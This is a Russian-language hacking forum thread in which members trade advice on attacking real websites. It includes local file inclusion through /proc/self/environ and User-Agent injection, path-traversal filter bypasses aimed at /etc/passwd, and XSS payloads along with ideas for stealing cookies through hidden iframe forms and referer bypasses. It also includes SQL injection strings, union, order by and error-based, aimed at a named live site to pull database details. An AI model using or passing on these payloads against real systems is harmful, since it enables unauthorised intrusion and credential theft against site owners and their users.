Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    &e=e=phpinfo(); - очепятка:)

    Пробовал и с <?php ?> и без них. Всеравно выводит только содержимое:( с записанным в него кодом.

    <?php phpinfo();?> вывело содержимое с записанным в него кодом.

    Вообще складывается такое впечатление что <?php ?>
    просто не интерпретируется как php :confused:

    Как бы сам сайт значения не имеет, но хочу понять почему так. В статьях нигде не указываются необходимые условия.
    Ну по крайней мере мне такие не встречались(или читал не внимательно:) В одной статье автор вообще утверждает что доступ к /proc/self/environ
    это 99% шелл :confused: Врет поди.

    Привожу скрин содержимого.

    Если код писать в User-Agent то вывод выглядит так.(Syntax Errors Found)
    [​IMG]

    а если в Accept, то так
    [​IMG]
     
  2. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    У тебя просто читалка, а не инклюд.
     
    _________________________
  3. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    при вводе
    Code:
    index.php&req_subject=1&req_message=1"><script>alert(1);</script>
    выводит
    где /index.php/script> ссылка на сайт в виде http://site.com/index.php/script> которая открывается без ошибок

    xss?
     
  4. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Скорее всего просто читалка.
    Но на всякий случай покажи вывод /proc/self/status, возможно PHP там не интерпретируется, если там CGI.

    Тут ничего нету.

    Не совсем понял. Так alert() выполнился или нет? Если нет, то там нету XSS - логично же? о_0
     
  5. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    есть пассивная xss в пост параметре, но включен magic_quotes - как с 13.14здить куки?

    вот мой сплоит

     
  6. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    2Tigger

    /proc/self/status,

    Name: heitml
    State: R (running)
    SleepAVG: 78%
    Tgid: 4627
    Pid: 4627
    PPid: 5784
    TracerPid: 0
    Uid: 65534 65534 65534 65534
    Gid: 65534 65534 65534 65534
    FDSize: 32
    Groups: 100 615 65534
    VmPeak: 13380 kB
    VmSize: 13380 kB
    VmLck: 0 kB
    VmHWM: 3004 kB
    VmRSS: 3004 kB
    VmData: 824 kB
    VmStk: 84 kB
    VmExe: 464 kB
    VmLib: 10972 kB
    VmPTE: 20 kB
    Threads: 1
    SigQ: 0/16383
    SigPnd: 0000000000000000
    ShdPnd: 0000000000000000
    SigBlk: 0000000000000000
    SigIgn: 0000000000001200
    SigCgt: 0000000180000000
    CapInh: 0000000000000000
    CapPrm: 0000000000000000
    CapEff: 0000000000000000
    Cpus_allowed: 0000000f
    Mems_allowed: 1
     
  7. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Хм... heitml, не встречался с таким.
    Укажи путь к любому PHP скрипту который есть на серваке, если страничку выполнит - инклюд, если откроет исходный код, то это просто читалка.
     
    #17667 Tigger, 16 Aug 2011
    Last edited: 16 Aug 2011
  8. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Все верно, оказалась просто читалка.:)
    Подскажите пожалуйста как бороться если дописывает папку в начале пути
    inc/../../../etc/passwd
    как обрезать расширение описано много, но вот как обрезать папку в начале никак не могу найти.
    или это не мешает и дополнительная ../ выйдет из папки

    (глупость по ходу спросил, но лучше перебдеть чем недобдеть:)
     
    #17668 Sloneny, 16 Aug 2011
    Last edited: 16 Aug 2011
  9. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    попробуй использовать в начале ....//
     
  10. .::f-duck::.

    .::f-duck::. Member

    Joined:
    30 May 2009
    Messages:
    343
    Likes Received:
    32
    Reputations:
    7
    Есть чятик. В чятике есть функция создания своего канала. Вот в поле "название канала" можно вставлять любой javascript, но уже потом, после создания, в title созданного канала это все дело фильтруется. Но при первичном отсылании запроса - js исполняется. Внимание вопрос: можно-ли как-то сделать так, что бы не надо было впаривать юзерам самим ввести js?
     
  11. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Можно

    p.s.: если хочешь услышать более подробный ответ, задай более подробный вопрос
     
  12. Boobby

    Boobby Member

    Joined:
    10 Aug 2011
    Messages:
    0
    Likes Received:
    20
    Reputations:
    5
    http://gb.anekdot.ru/scripts/gb.php?component=gb&id=' так и не понял что за бага/
    разъясните что за фрукт пожалуйста :)
     
    #17672 Boobby, 17 Aug 2011
    Last edited: 17 Aug 2011
  13. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Это не то, о чем ты подумал. Там intval на id
     
  14. ridik77

    ridik77 New Member

    Joined:
    9 Aug 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    обезательно делать так что бы выбило ошибку для пхп инъекции? или можно попробовать залить шелл вставив его сюда nds.com/index.php?view=.......
     
  15. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Если нет проверки referer, капчи, токенов - то можно. Это POST XSS. Нужно создать HTML файл с зловредной формой, и написать яваскрипт отправляющий её на сервер. Если всё получиться, то спрятать её в IFrame на каком ни будь сайте.

    P.S. Можешь стукнуть в ПМ.
     
    #17675 randman, 17 Aug 2011
    Last edited: 17 Aug 2011
  16. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Если есть тоже можно ;)

    Там где пост, и гет недалек, скорее всего работает и то и другое, другое дело что когда есть гет то не факт что есть пост, данные в пост практически всегда фильтруются лучше гет
     
    #17676 eclipse, 17 Aug 2011
    Last edited: 17 Aug 2011
  17. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Первое - Там совсем не то. Совсем нельзя ;) А в той статье просто рассказываться использование XSS помимо кражи кук.
    //Если уж есть XSS, подходящая к твоей статье, нет смысла использовать эту.

    Кроме того, существуют кривые фильтры на проверку REFERER, будут пропускать например такое:
    Code:
    https://forum.antichat.net/qwerty
    in
    https://xakep.ru/forum.antichat.net/qwerty
    
    А токены могут вовсе не проверяться.

    Другое дело - XSS уже есть, но куки защищены по IP. В этом случае нужно ичпользовать что то нестандартное, от отправки запросов до прикручивания антигейта к капче(JavaScript).

    UDP для M_Script:
    Я прикручивал :cool: Разуметься через серверного посредника(PHP, Perl...).
     
    #17677 randman, 17 Aug 2011
    Last edited: 17 Aug 2011
  18. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Он имел ввиду защиту именно в запросе, которым внедряется код. Есть защита -> нет XSS -> нет обхода защиты.
    Откуда такая статистика?

    Преувеличил немного возможности JS =)
     
    #17678 M_script, 17 Aug 2011
    Last edited: 17 Aug 2011
  19. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    А ты посчитай сколько я выложил тут XSS :D

    ХАМЕНА, M_Script, На счет использования обхода внутри XSS, извиняйте, я вас не понял, мне показалось что XSS уже есть))
     
    #17679 eclipse, 17 Aug 2011
    Last edited: 17 Aug 2011
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Нарвался на одну интересную скулю.

    Code:
    http://sotchi-2014.info/content.php?id=1'
    Пробовал сначала крутить через union, но скрипт грязно ругнулся

    Code:
     http://sotchi-2014.info/content.php?id=-999'+union+select+1+--+
    
    The used SELECT statements have a different number of columns
    В принципе я читал об объединение запросов и понимаю, что тут косяк в нессответствии столбцов при втором запросе.

    Но опять же следующий запрос выводится корректно

    Code:
    http://sotchi-2014.info/content.php?id=-999'+order+by+1+--+  TRUE
    
    http://sotchi-2014.info/content.php?id=-999'+order+by+2+--+   FALSE
    Что навело на мысль, что колонка всё таки 1.

    Далее попробовал крутануть через другой метод.

    Code:
    http://sotchi-2014.info/content.php?id=5'+or+1+group+by+concat((database()),floor(rand(0)*2))+having+min(0)+or+1+--+
    БД, юзверя, и версию выводит корректно.
    На попытку вывести что либо ещё ругается на СЕЛЕКТ.

    Подскажите, каким путём докрутить данную скулю ?
     
    _________________________
Thread Status:
Not open for further replies.